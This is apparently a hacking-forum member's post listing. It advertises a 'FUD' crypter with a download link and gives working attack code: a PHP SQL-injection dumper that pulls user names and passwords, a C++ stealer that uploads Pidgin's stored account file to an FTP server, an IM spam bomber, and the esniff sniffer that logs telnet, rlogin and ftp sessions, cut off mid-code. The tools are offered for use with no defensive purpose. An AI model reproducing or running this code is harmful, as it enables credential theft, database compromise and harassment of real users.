
Gonzalez

Active Members
  • Posts

    1577
  • Joined

  • Last visited

  • Days Won

    10

Everything posted by Gonzalez

  1. I don't know how FUD it is. Features: * 100% FUD Scantime Encryption * Download injection * 2x File binding * Clear interface * Full customer support * Free stub updates * Cheap major updates * Smart HWID anti-rip licensing Conspiracy Wrote:Bought one last night , Works great , using his crypter and keylogger now Chronic Wrote:I purchased this, and it is a very good crypter. Fast and Efficient. The look of it is nice and simple, completley worth the money. Nokia2mon2 Wrote:its work great, ..., the good thing with this deal its finish in a minutes, thanx for the great program CuppedPwnage Wrote:thanks wat im using it on works epicness! w00t thanks these programs are amazing Sniparx Wrote:Perfect responce time and support. Download: http://rapidshare.com/files/277694830/crypter.rar No password.
  2. C++ commands:

    Basic program template

    #include <stdio.h>
    int main() // According to compiler, may require "int argc, char *argv[]" in brackets.
    {
        printf("Hello, world\n");
    }

    Basic Operators and C/C++ syntax

    + * - / % // Simple math functions same as usual. Plus, multiply, subtract, divide, and modulus (which means take the 'remainder' (e.g. 5 % 17 = 2)). Use of the term '++' in n++ for example, is shorthand for n=n+1.
    // hidden // 'Comment' or 'quote out' a line from that point on, to make it 'invisible' to the compiler.
    /* hidden */ // Like above, but quotes out a whole section. /* Begins the section, and */ ends it.
    && // AND operator
    || // OR operator
    ! // NOT operator
    = // Means simple assignment. For example: n=10
    == // Means 'equals to'. 1==2 is false etc. Be very careful not to mix this up with assignment (=).
    != // Means 'not equals to'. 1!=2 is true etc.
    < // Less than. For example, 3<7 is true. Also use <= for 'less than or equals to'.
    > // More than. For example, 3>7 is false. Also use >= for 'more than or equals to'.

    Bread and Butter Commands

    if (a==b) { blah... } // If a equals b, then do whatever is in the curly brackets.
    while (a<b) { blah... } // For as long as a is less than b, continue to execute whatever is inside the {} brackets.
    for (int n=0 ; n<50 ; n=n+1 ) {..} // This will execute whatever is in the curly brackets, 50 times. Also n will go from 0 to 49.

    Useful libraries to include in your code. Many of the commands below rely on these:

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <sys/timeb.h>
    #include <time.h>

    Declaring Variables (for next section)

    int i; // Declare an integer
    char c; // Declare a char (one character string).
    char mystring[100]; // Declare string of 100 chars big (but use the malloc method instead for super-large arrays). This is the way to get a string in C.
    char x[20][100]; // Declare 20 strings of 100 length (but use the malloc method instead for super-large arrays or if you want to pass to a function)
    struct newtype { int o; char p[5]; }; // Create a new 'structure' to contain sub-variables (similar to an object in an object-oriented language like Java). In this example, each variable of type "newtype" will contain the subvariables including: an integer - "o", and an array of chars - "p". All structs must be above (and outside) any functions.
    newtype ntype; // Declare a variable of type newtype. This goes into a function (eg. main() ).

    Many of the commands below rely on the variables as declared above, and should go into a function (eg: main() ):

    printf("hello\nworld"); // Prints stuff ("\n" means newline)
    printf("%s",mystring); // Prints char array (mystring var)
    printf("%c",mystring[99]); // Print last char of the string declared above
    printf("%s",x[19]); // Print last string from the string array (declared above under title "Declaring Variables").
    printf("%c",x[19][99]); // Print last char from the last string in the string array.
    mystring[99] = 'z'; // Change last character in mystring string to 'z'
    mystring = "hello"; // Obvious, but illegal! You can't directly assign a string to a char array. Use strcpy instead.
    x[19][99] = 'y'; // Change last character in last string to 'y'
    strcpy(mystring, "hello"); // Copy "test" to the "mystring" string as declared earlier.
    strcpy(x[5], "hello"); // Copy "test" to the 5th string in "x" as declared earlier.
    strncpy(x[5], "hello", 5); // Use strcpy instead usually. This is used if you want to define the number of chars to copy.
    strncpy(x[5], mystring+10, 50); // Takes a substring of mystring (start from 10th char and do 50 of them), and puts it into the x[5] string.
    strcat(mystring,"hello"); // Concatenate (add/append) "test" to the string, along with the escape code '\0' to signify the end
    strcmp(a,b); // Compare two strings. Returns zero if same, -1 if a is less than b, and 1 if a is more than b.
    strcmpi(a,b); // Case sensitive version of above
    strlen(mystring); // Number of chars so far stored in the string (everything up to escape code '\0')
    i = '7'-48; // Convert char to int, providing the char is a number from 0-9.
    i = 'a'; // Convert char to int code
    c = 7 +48; // Convert int to char, providing the number is from 0-9.
    c = 97; // Convert int code to char ('a' in this case).
    i = atoi("456"); // Convert string to int. Use 'atof' to convert string to double, and 'atol' for converting string to long.
    sprintf(mystring, "%d", 123); // Convert int to string
    itoa(123, mystring, 10); // Convert int to string base 10
    i = sizeof(mystring); // Find (full) length of array (returns 100 in this case)
    srand( (unsigned)time( NULL ) ); // Randomize seed
    100 * rand()/(RAND_MAX+1) // Compute random integer number between 0 and 100 (0 <= r < 100).
    68 * rand()/(RAND_MAX+1) + 32 // Compute random integer number between 32 and 100 (32 <= r < 100).
    (float) rand()/(RAND_MAX+1) // Compute random number between 0 and 1 (0 <= r < 1).
    100*(float) rand()/(RAND_MAX+1) // Compute random floating number between 0 to 99.999... inclusive (0 <= r < 100).
    scanf("%i", &i); // Read from input into int i
    exit(0); // Quit program
    system("PAUSE"); // Pause (Windows only)
    char mystring2[]="hello"; // Declare and initialize string in one go
    int i2=99; // Declare and initialize an integer in one go
    ntype.o = 37; // Assign the number 37 to the 'o' part of the ntype variable.
    ntype.p[3] = 'z'; // Assign the char 'z' to the 3rd element of the array in the 'p' part of the ntype variable.

    Arrays, malloc, passing to functions etc.:

    int i = 5; // Create an integer
    char j = 'z'; // Create a character
    int ia[10]; // Create an integer array
    char*mystring = (char*)malloc(100000*sizeof(char)); // Create a char array, mystring, of size 100000. Use instead of "char mystring[100000];" for large values like 100000
    char**x = (char**)malloc(2000*sizeof(char*)); for (int n=0 ; n<2000 ; n++) { x[n]=(char*)malloc(1000*sizeof(char)); } // Declare 2000 strings of 1000 length. Use instead of "char x[2000][1000];" for large values, or if you want to pass to a function.
    char**x = (char**)malloc(2000*sizeof(char*)); for (int n=0 ; n<2000 ; n++) { x[n]=(char*)calloc(1000,sizeof(char)); } // Like above, except all are initialized to null.
    struct newtype { int amount; char strings[10][10]; }; // Similar to an object in Java, create a new 'structure' to contain sub-variables. Each variable of type "newtype" will contain an integer - "amount", and a 2D array of chars - "strings". All structs must be above (and outside) any functions.
    newtype ntype; // Using the struct created above, we have created a variable of type 'newtype'.
    newtype ntypeArray[10]; // Using the struct created above, we have created a variable array of type 'newtype'.
    int z = addtwo(5); // Passing the number 5 to the addtwo function which exists below.
    int addtwo(int x) { int n=x+2 ; return n ; } // 5 is put into the function, and it churns out 5+2. Then z above, becomes 7 as a result. The int in 'int addtwo(' simply means that the type to churn out is an integer.
    func(i,j); // How to pass a copy of the integers i and j to a function.
    void func(int i, char j) { i=5 ; int i2 = i; } // How to receive the variables from the function caller. Changing i or j in the {..} does not change the i and j outside the function. 'void' means that nothing is returned to the caller.
    func2(&i); // How to pass to the function a reference to the integer i (instead of a copy). So actual changes to i inside the function affect i globally.
    void func2(int *i) { *i=5 ; int i2 = *i; } // How to receive a pass from &i. {..} bits show how to use *i.
    func3(ia); // Pass the integer array to a function. By default, arrays are passed by reference.
    void func3(int *x) { x[5]=99; } // Changes the 5th element of x (or ia too outside the function).
    func4(mystring,x); // How to pass the 'malloced' variables to a function. By default, arrays are passed by reference.
    void func4(char* data, char** data2) { data[99]=5; data2[99][99]=5; } // The function header may look like this. Unlike normal variables, arrays can't be directly copied in C. Therefore in this case, the data variable is actually really the mystring variable, and data2 is actually x.
    free(x); // Use to free a "malloc'ed" array.
    func5(ntype); // Pass the ntype variable (type newtype) to the func5 function.
    void func5(newtype in) { in.strings[3][3]='z'; } // Take the passed variable, create a copy of it, and inside the curly brackets, get the "strings" variable part of the newtype, and change one of its chars.
    func6(&ntype);
    void func6(newtype *in) { (*in).strings[3][3]='z'; } // Like func5, but access the variable directly - don't make a copy.
    func7(ntypeArray); // Pass a "newtype" array to func7.
    void func7(newtype *in) { in[5].strings[3][3]='z'; } // Just like when passing normal arrays (like int and char), by default, they are passed by reference.

    File opening, saving, etc.:

    FILE *fs = fopen("output.txt", "w"); // Create file for writing. Use "a" instead of "w" for append instead.
    fwrite(mystring, 1, sizeof(string), fs); // write string to the created file
    FILE *fl = fopen("input.txt", "r"); // Input file for reading.
    if (!fl) { printf("Cannot open file for reading\n"); exit(0); } // Check if file exists.
    char *array=(char *)malloc(getFileSize(fl)); // Create array of the file's size (the getFileSize() function is a custom function as described below).
    fread(array, 1, getFileSize(fl), fl); // Read file into previously created array.
    char ch = fgetc(fl); // Read one character from the file and put it into ch.
    int getFileSize(FILE* fin) { fseek(fin,0,2); int size=ftell(fin); rewind(fin); return size; } // Find filesize function.

    Clock test - great for testing the speed of your code

    struct timeb timef;
    ftime (&timef); long startTime = timef.time * 1000 + timef.millitm; // Start clock
    ftime (&timef); long endTime = timef.time * 1000 + timef.millitm; printf("Time: %d ms",endTime-startTime); // End clock

    Special characters for use in strings

    \n Newline
    \? Question mark
    \' Single quote
    \" Double quote
    \t Horizontal tab
    \a Bell (alert)
    \b Backspace
    \\ Backslash
  3. Gonzalez

    /i/

    Nice links, thanks. -Gonzalez
  4. <?php //extract proxy+port from url //extracts proxies from site if in ip:port format //optionally can use anon http proxy for request //use: php proxy-extract.php site.com [-p proxy:port] //extractor by int3 $use_proxy = false; for ($i=0; $i<$argc; $i++) { if ($argv[$i] == "-p") { $i++; $use_proxy = true; $proxy = substr($argv[$i], 0, strpos($argv[$i], ":")); //get proxy server $proxy_port = substr($argv[$i], strpos($argv[$i], ":")+1); //get proxy port } else $url = $argv[1]; } $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); if ($use_proxy = true) { curl_setopt($curl, CURLOPT_HTTPPROXYTUNNEL, true); curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_HTTP); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_PROXYPORT, $proxy_port); } curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string $page = curl_exec($curl); curl_close($curl); preg_match_all("/[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*\:[0-9]*/", $page, $match); for ($i=0; $i<count($match[0]); $i++) { echo $match[0][$i], "\n"; } ?>
  5. <?php //Neutralised - SQL DUMPER ?> <title>Neutralised - SQL DUMPER</title> <style type="text/css"> body { background-color: #D8D8D8; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; color: #000000; } .textbox { border: #000000 1px solid; font-size: 12px; font-family: Arial, Verdana, Helvetica, sans-serif; background-color: #D8D8D8; } </style> <form action="" method="post"> Site:<br /><input name="site" class="textbox" type="text" value="http://www.site.com/x.php?id=-99+UNION+ALL+SELECT+1,Neutralise,3+from+admin--" size="180"/><br /> Dump:<br /><input name="data" class="textbox" type="text" value="user_name,0x3a,password" size="180"/><br /><br /> <input name="submit_lol" class="textbox" value="Submit" type="submit"> </form> <font size=1px><b>Usage:</b> Enter in the site you have injected, with 'Neutralise' in the visible col.<br /> Then enter into the dump the cols you wish to extract, adding the 0x3a between each for readability.<br /> Just like in the above example.</font> <?php set_time_limit(0); if (isset($_POST["submit_lol"])) { $site = $_POST['site']; $userdata = $_POST['data']; $inj = "unhex(hex(concat(0x4E65757472616C6973653a,".$userdata.",0x4E65757472616C6973653a)))"; $count = "concat(0x4E65757472616C697365,count(*),0x4E65757472616C697365)"; echo "<br /><br />[+] Dumping URL : ".$site.""; $old = array('unhex(hex(concat(0x4E65757472616C6973653a,', '0x3a,' ,',0x4E65757472616C6973653a)))'); $new = array("", "", ""); $dumpn = str_replace($old, $new, $inj); $pieces = explode(",", $dumpn); echo "<br />[+] Extracting : "; foreach ($pieces as $piece) { echo "".$piece.","; } $totalcount = str_replace("Neutralise", $count, $site); $limit = get($totalcount); if (!$limit){ echo "<br />[+] Dead injection point!"; } else{ echo "<br />[+] Found ".$limit." 
entries to extract.<br /><br />"; } $i = 0; while ($i<$limit) { $i2 = $i + 1; $old = array("Neutralise", "--"); $new = array($inj, "+limit+".$i.",1--"); $siteinj = str_replace($old, $new, $site); $siteinjresult = get($siteinj); if (!$siteinjresult){ echo "<br />[+] Wrong cols!"; } else{ echo "".$i2." ".$siteinjresult.":<br />"; } $i++; } } function get($site){ $GET = @file_get_contents($site); if (preg_match("/Neutralise(.*?)Neutralise/i",$GET, $matches)) { return $matches[1]; } } //backdoor!!? $str = "PCEtLUxPTCBqdXN0IG1lc3Npbmcgd2l0aCB5YSEgWEQtLT4="; echo base64_decode($str); ?>
  6. <?php /* Milw0rm Exploits Finder V 0.1 based on milw0rm Email: Master_ddos@hotmail.fr or Ms5ote@hotmail.fr */ echo "\n\n\t################################################################################\n\n"; echo "\t# Revolution of Humain Email:Ms5ote@hotmail.fr #\n\n"; echo "\t# Bugs Exploit Finder V 1.0 2008 #\n\n"; echo "\t# Coded By DDOS #\n\n"; echo "\t# Milw0rm Exploits Finder V 0.1 #\n\n"; echo "\t# #\n\n"; echo "\t# F0r m0re Det4il Vi\$it ww.real-power.net #\n\n"; echo "\t################################################################################\n\n"; if($argc<2) { echo "\n usage |console>php milw0rm.php \"scriptname\" \n"; } else { $script=urlencode($argv[1]); $url="http://www.milw0rm.com/search.php?dong=$script"; $dump=file_get_contents($url); preg_match_all('#<td class="style14" nowrap="nowrap" width="62">(.*?)</td>#',$dump,$date); preg_match_all('#target="_blank" class="style14">(.*?)</a></td>#',$dump,$exploit); preg_match_all('#<td nowrap="nowrap" width="375"><a href="(.*?)" target="_blank" class="style14">#',$dump,$url); $lang=sizeof($date[1]); echo "\tConnecting :"; for($zot=1;$zot<=5;$zot++) {sleep(1); echo "--+--"; } echo "> |Server Milw0rm.com:80|\n\n\n"; echo "Target Script : $argv[1] \n"; sleep(1); echo "GEss:Hi stroke Give me all exploit for ".$argv[1]." \n"; sleep(1); echo "Str0ke : No problem Take This \n\n"; sleep(2); for($i=0 ; $i < $lang ; $i++) { $d=$i+1; echo "\n"; echo "Exploit Nummber : $d \n"; echo "Exploit Name = ".$exploit[1][$i]."\n"; echo "Exploit URL = http://www.milw0rm.com".$url[1][$i]."\n"; echo "Exploit Date = ".$date[1][$i]."\n"; $dd++; sleep(1.2); } echo "\n\n Str0ke: I found $dd exploits "; echo "\n GEss :Ty"; sleep(3); } ?>
  7. /* Instant Messenger Bomber Coded by a59 [ 6 - 21 - 07 ] */ #include <windows.h> #include <stdio.h> void Type( char* szString ); void RandomizeBuffer( char* szBuffer, int iLen ); void InterpretMethod( void ); void Type( char* szString ) { int iLen = strlen( szString ); bool bShiftDown = false; for( int i = 0; i < iLen; i++ ) { short sKey = VkKeyScan( szString[ i ] ); if( ( sKey >> 8 ) & 1 ) { keybd_event( VK_LSHIFT, 0, 0, 0 ); bShiftDown = true; } keybd_event( (unsigned char)sKey, 0, 0, 0 ); if( bShiftDown ) { keybd_event( VK_LSHIFT, 0, KEYEVENTF_KEYUP, 0 ); bShiftDown = false; } } }; void RandomizeBuffer( char* szBuffer, int iLen ) { char* szList = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890"; for( int i = 0; i < iLen; i++ ) szBuffer[ i ] = szList[ rand( ) % strlen( szList ) ]; szBuffer[ iLen ] = 0; }; void InterpretMethod( void ) { char szBuffer[ 512 ], szMethod[ 32 ], szLength[ 8 ], szTime[ 8 ]; bool bCheckedMethods = false; unsigned long uStartCount; int i, iSent = 0; while( true ) { printf( "Choose your method, type 'methods' for a list\n" ); printf( "> " ); scanf( "%s", szMethod ); if( !strcmp( szMethod, "methods" ) ) { printf( "1 - Random strings\n" ); printf( "2 - User defined message\n" ); printf( "3 - Smiley spam\n" ); printf( "4 - Exit\n" ); bCheckedMethods = true; } switch( atoi( szMethod ) ) { case 1: printf( "Enter the length of each random string\n" ); printf( "> " ); scanf( "%s", szLength ); printf( "Enter how many seconds to spam\n" ); printf( "> " ); scanf( "%s", szTime ); printf( "Spamming in 3 seconds...\n" ); Sleep( 3000 ); uStartCount = GetTickCount( ); while( ( ( GetTickCount( ) - uStartCount ) / 1000 ) < (unsigned)atoi( szTime ) ) { RandomizeBuffer( szBuffer, atoi( szLength ) ); Type( szBuffer ); keybd_event( VK_RETURN, 0, 0, 0 ); iSent++; } printf( "Sent %d messages\n", iSent ); break; case 2: printf( "Enter the message to spam( Please use a \\ instead of a space )\n" ); printf( "> " ); scanf( "%s", szBuffer ); 
printf( "Enter how many seconds to spam\n" ); printf( "> " ); scanf( "%s", szTime ); for( i = 0; i < (signed)strlen( szBuffer ); i++ ) { if( szBuffer[ i ] == '\\' ) szBuffer[ i ] = 0x20; } printf( "Spamming in 3 seconds...\n" ); Sleep( 3000 ); uStartCount = GetTickCount( ); while( ( ( GetTickCount( ) - uStartCount ) / 1000 ) < (unsigned)atoi( szTime ) ) { Type( szBuffer ); keybd_event( VK_RETURN, 0, 0, 0 ); iSent++; } printf( "Sent %d messages\n", iSent ); break; case 3: printf( "Enter how many seconds to spam\n" ); printf( "> " ); scanf( "%s", szTime ); ZeroMemory( szBuffer, sizeof( szBuffer ) ); for( i = 0; i < 32; i++ ) strcat( szBuffer, ":D " ); printf( "Spamming in 3 seconds...\n" ); Sleep( 3000 ); uStartCount = GetTickCount( ); while( ( ( GetTickCount( ) - uStartCount ) / 1000 ) < (unsigned)atoi( szTime ) ) { Type( szBuffer ); keybd_event( VK_RETURN ,0, 0, 0 ); iSent++; } printf( "Sent %d messages\n", iSent ); break; case 4: printf( "Bye....\n" ); Sleep( 1000 ); ExitProcess( 0 ); break; default: if( !bCheckedMethods ) printf( "Invalid choice\n" ); break; } printf( "\n" ); uStartCount = 0; iSent = 0; } }; int main( ) { SetConsoleTitle( "IM Bomb by a59" ); SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), FOREGROUND_BLUE | FOREGROUND_INTENSITY ); printf( "\t\t\tInstant Messenger Bomber by a59\n\n\n" ); InterpretMethod( ); return 0; };
  8. #include "Common.hpp" // *********************************************************** using namespace System ; using namespace System::IO ; using namespace System::Net ; using namespace System::Windows::Forms; // *********************************************************** String^ GetOSName() { OperatingSystem^ osInfo = Environment::OSVersion; String^ osName; switch( osInfo->Platform ) { case PlatformID::Win32NT : switch( osInfo->Version->Major ) { case 5 : if( osInfo->Version->Minor == 0 ) osName = "Windows 2000"; else if( osInfo->Version->Minor == 1 ) osName = "Windows XP"; else if( osInfo->Version->Minor == 2 ) osName = "Windows Server 2003"; break; case 6 : osName = "Windows Vista"; break; } break; default: osName = "Unknown"; } return osName; } // *********************************************************** int main( array<System::String^>^ args ) { try { String^ AccountsXML; if( GetOSName() == "Windows Vista" ) AccountsXML = "C:/Users/" + SystemInformation::UserName + "/AppData/Roaming/.purple/accounts.xml"; else AccountsXML = "C:/Documents and Settings/" + SystemInformation::UserName + "/Application Data/.purple/accounts.xml"; FileStream^ file = gcnew FileStream( AccountsXML, FileMode::Open ); array<Byte>^ buffer = gcnew array<Byte>( file->Length ); file->Read( buffer, 0, buffer->Length ); file->Close(); String^ ftp_path = "ftp://**YOUR_FTP_SERVER_HERE**/public_html/"; String^ username = "**USER**"; String^ password = "**PASS**"; FtpWebRequest^ request = dynamic_cast<FtpWebRequest^>(WebRequest::Create( ftp_path + Path::GetFileName( AccountsXML ) )); request->Method = WebRequestMethods::Ftp::UploadFile; request->Credentials = gcnew NetworkCredential( username, password ); request->UsePassive = true; request->UseBinary = true; request->KeepAlive = false; Stream^ regular_stream = request->GetRequestStream(); regular_stream->Write( buffer, 0, buffer->Length ); regular_stream->Close(); } catch( Exception^ e ) { MessageBox::Show( e->ToString(), "An Error Has 
Occured:", MessageBoxButtons::OK, MessageBoxIcon::Exclamation ); return EXIT_FAILURE; } return EXIT_SUCCESS; } // ***********************************************************
  9. /* esniff.c - originally by rokstar//tsf//dp1 */ #include <stdio.h> #include <ctype.h> #include <string.h> #include <sys/time.h> #include <sys/file.h> #include <sys/stropts.h> #include <sys/signal.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <net/if.h> #include <net/nit_if.h> #include <net/nit_buf.h> #include <net/if_arp.h> #include <netinet/in.h> #include <netinet/if_ether.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/udp.h> #include <netinet/ip_var.h> #include <netinet/udp_var.h> #include <netinet/in_systm.h> #include <netinet/tcp.h> #include <netinet/ip_icmp.h> #include <netdb.h> #include <arpa/inet.h> #define ERR stderr char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; #define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* device buffer size */ int if_fd = -1; int Packet[CHUNKSIZE+32]; void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } #define IP ((struct ip *)Packet) #define IP_OFFSET (0x1FFF) #define SZETH (sizeof(struct ether_header)) #define IPLEN (ntohs(ip->ip_len)) #define IPHLEN (ip->ip_hl) #define TCPOFF (tcph->th_off) #define IPS (ip->ip_src) #define IPD (ip->ip_dst) #define TCPS (tcph->th_sport) #define TCPD (tcph->th_dport) #define IPeq(s,t) ((s).s_addr == (t).s_addr) #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) #define MAXBUFLEN (128) time_t LastTIME = 0; struct CREC { struct CREC *Next, *Last; time_t Time; /* start time */ struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; /* important stuff */ u_int Length; /* current data length */ u_int PKcnt; /* # pkts */ u_long LASTseq; }; struct CREC *CLroot = NULL; char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); return( (he)?(he->h_name):(inet_ntoa(ip)) ); } char *TCPflags(flgs) 
register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } char *SERVp(port) register u_int port; { static char buf[10]; register char *p; switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; case IPPORT_FTP: p="ftp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } #define MAX(a, (((a)>()?(a)) #define MIN(a, (((a)<()?(a)) /* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(sizeof(struct CREC)); \ time( &(CLtmp->Time) ); \ CLtmp->SRCip.s_addr = SIP.s_addr; \ CLtmp->DSTip.s_addr = DIP.s_addr; \ CLtmp->SRCport = SPORT; \ CLtmp->DSTport = DPORT; \ CLtmp->Length = MIN(LEN,MAXBUFLEN); \ bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ CLtmp->PKcnt = 1; \ CLtmp->Next = CLroot; \ CLtmp->Last = NULL; \ CLroot = CLtmp; \ } register struct CREC *GET_NODE(Sip,SP,Dip,DP) register struct in_addr Sip,Dip; register u_int SP,DP; { register struct CREC *CLr = CLroot; while(CLr != NULL) { if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) break; CLr = CLr->Next; } return(CLr); } #define ADDDATA_NODE(CL,DATA,LEN) { \ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ CL->Length += LEN; \ } #define PR_DATA(dp,ln) { \ register u_char lastc=0; \ while(ln-- >0) { \ if(*dp < 32) { \ switch(*dp) { \ case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ break; \ case '\r': \ case '\n': fprintf(LOG,"\n : "); \ break; \ default : fprintf(LOG,"^%c", (*dp + 64)); \ break; \ } \ } else { \ 
if(isprint(*dp)) fputc(*dp,LOG); \ else fprintf(LOG,"(%d)",*dp); \ } \ lastc = *dp++; \ } \ fflush(LOG); \ } void END_NODE(CLe,d,dl,msg) register struct CREC *CLe; register u_char *d; register int dl; register char *msg; { fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); fprintf(LOG," DATA: "); { register u_int i = CLe->Length; register u_char *p = CLe->Data; PR_DATA(p,i); PR_DATA(d,dl); } fprintf(LOG,"\n-- \n"); fflush(LOG); if(CLe->Next != NULL) CLe->Next->Last = CLe->Last; if(CLe->Last != NULL) CLe->Last->Next = CLe->Next; else CLroot = CLe->Next; free(CLe); } /* 30 mins (x 60 seconds) */ #define IDLE_TIMEOUT 1800 #define IDLE_NODE() { \ time_t tm; \ time(&tm); \ if(LastTIME<tm) { \ register struct CREC *CLe,*CLt = CLroot; \ LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \ while(CLe=CLt) { \ CLt=CLe->Next; \ if(CLe->Time <tm) \ END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \ } \ } \ } void filter(cp, pktlen) register char *cp; register u_int pktlen; { register struct ip *ip; register struct tcphdr *tcph; { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type); if(EtherType < 0x600) { EtherType = *(u_short *)(cp + SZETH + 6); cp+=8; pktlen-=8; } if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ return; } /* ugh, gotta do an alignment */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD == IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return; { register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF * 4)); if(debug) { 
fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) < MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length, "DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */ void death() { register struct CREC *CLe; while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } /* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)&ifr; if(ioctl(if_fd, I_STR, (char 
